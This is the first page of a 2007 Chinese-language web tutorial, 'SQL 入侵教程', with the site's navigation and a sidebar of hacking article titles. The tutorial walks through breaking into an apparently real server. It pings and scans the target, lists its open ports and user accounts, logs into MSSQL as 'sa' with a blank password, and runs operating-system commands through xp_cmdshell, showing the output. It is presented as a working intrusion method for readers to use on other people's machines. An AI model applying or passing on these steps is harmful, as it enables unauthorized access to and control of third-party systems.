文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | firefox | WPS | 杀毒软件 | Picasa
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术SQL 入侵教程
精品推荐
特别推荐
·在QQ上与任意陌生人聊天的新绝招
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
·黑客攻击的几种常用手法及防御技巧
·经典常见计算机密码破解实用手册
·经典总结:各个网络端口的入侵
·最详细的黑客入门法则
·Telnet高级入侵攻略及原理
热点TOP10
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·Windows黑客编程基础
·经典常见计算机密码破解实用手册
·谁能知道微软在你的计算机里隐藏的秘密
·流光5.0使用小窍门
·不用任何软件(木马程序)盗取账号密码
·菜鸟变黑客高手
·从零开始学黑客:网络黑客新手入门指南
·黑客技术之知道对方IP入侵别人的电脑
·IIS攻击与日志
·黑客破解电脑密码实用技巧大全!
·流光教程一
·Telnet高级入侵攻略及原理
·公钥密码系统及RSA公钥算法
·收费网站破解攻略
·经典:各个网络端口的入侵方法
·黑客入侵前的信息收集
·带你认识冰河,如果也想做个木马的话

SQL 入侵教程

日期:2007年3月13日 作者:清风网络学院 查看:[大字体 中字体 小字体]


先ping出目标主机的IP地址: 
连接IP主机: 211.154.xxx.xx... 
发送 56 个字节... 
接收到 56 个字节! 历时: 0毫秒 
结论: IP主机正在与Internet连接中... 

  接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 

主机信息 
主机名:BEWDB01NOK 
80(HTTP) 
21(FTP Control) 
25(SMTP) 
443(HTTPS) 
1433(MSSQL
5631(PCAnyWhere) 
用户列表 
Administrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 
漏洞: 
/\../readme.txt (HTTP: 200 ) 
/msadc/msadcs.dll (HTTP: 200 ) 
/iisadmpwd/achg.htr (HTTP: 200 ) 
/_AuthChangeUrl (HTTP: 200 ) 
/?PageServices (HTTP: 200 ) 

  上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的ASP/cgi漏洞。而从所开端口来看, 

21(FTP Control) 
1433(MSSQL) 
5631(PCAnyWhere) 
只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从 
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx 
Username为sa 
passWord框空,连接: 

SQL>Connecting 211.154.xxx.xx 
SQL>Connected to 211.154.xxx.xx 

  呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以XP_cmdshell " "的形式运行任意dos指令了!dir一下试试看: 
SQL>Command: xp_cmdshell "dir c:\" 
驱动器 C 中的卷没有卷标。 
卷的序列号是 5CBD-664C 
卷的序列号是 5CBD-664C 
c:\ 的目录 
c:\ 的目录 
01-12-20 08:13p <DIR> 2u2u 
01-07-23 08:10p 0 AUTOEXEC.BAT 
01-11-28 04:02p 84 biaoti.txt 
01-07-23 08:10p 0 CONFIG.SYS 
01-11-22 11:49a <DIR> InetPub 
01-10-25 11:12a 15,360 kkkk.XLS 
01-07-24 12:09p <DIR> MSSQL7 
01-12-12 11:00a 134,217,728 pagefile.sys 

[1] [2] [3] 下一页 




上一篇:配置RD9中的DNS

下一篇:Win Server 2003无盘终端网组建

SQL 入侵教程 相关文章:
·Photoshop抠头发高级抠图教程
·photoshop修改照片成为美女教程
·外挂 录象 网站 举报方案最新教程_QQ堂
·非主流ps教程实用的技巧大全
·AIX 5L 学习大纲/简易教程(2)(未经许可,请勿COPY)
·3DS MAX图文教程:事件驱动粒子系统——喷泉效果
·Photoshop教程:MM照片弄得非常脏特效
·流光破解ftp密码教程
·Helix流媒体服务器架设及RMVB制作教程
·图文教程 Windows 2003群集服务配置
SQL 入侵教程 相关软件:
·大师之路Photoshop教程V2.0
·孙鑫VC++从入门到精通开发详解视频教程FLASH版
·计算机基础知识教程
·黑客视频教程 VMware虚拟机的安装和使用
·主板BIOS设置 视频教程
·刘天礼 吉他视频教程
·招聘面试技巧 视频教程
·CorelDraw12 入门与实例(图文教程 菜鸟先飞系列教材)
·Flash MX2004中文版多媒体教程
·黑娃破解教程(破解成人收费网站)

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot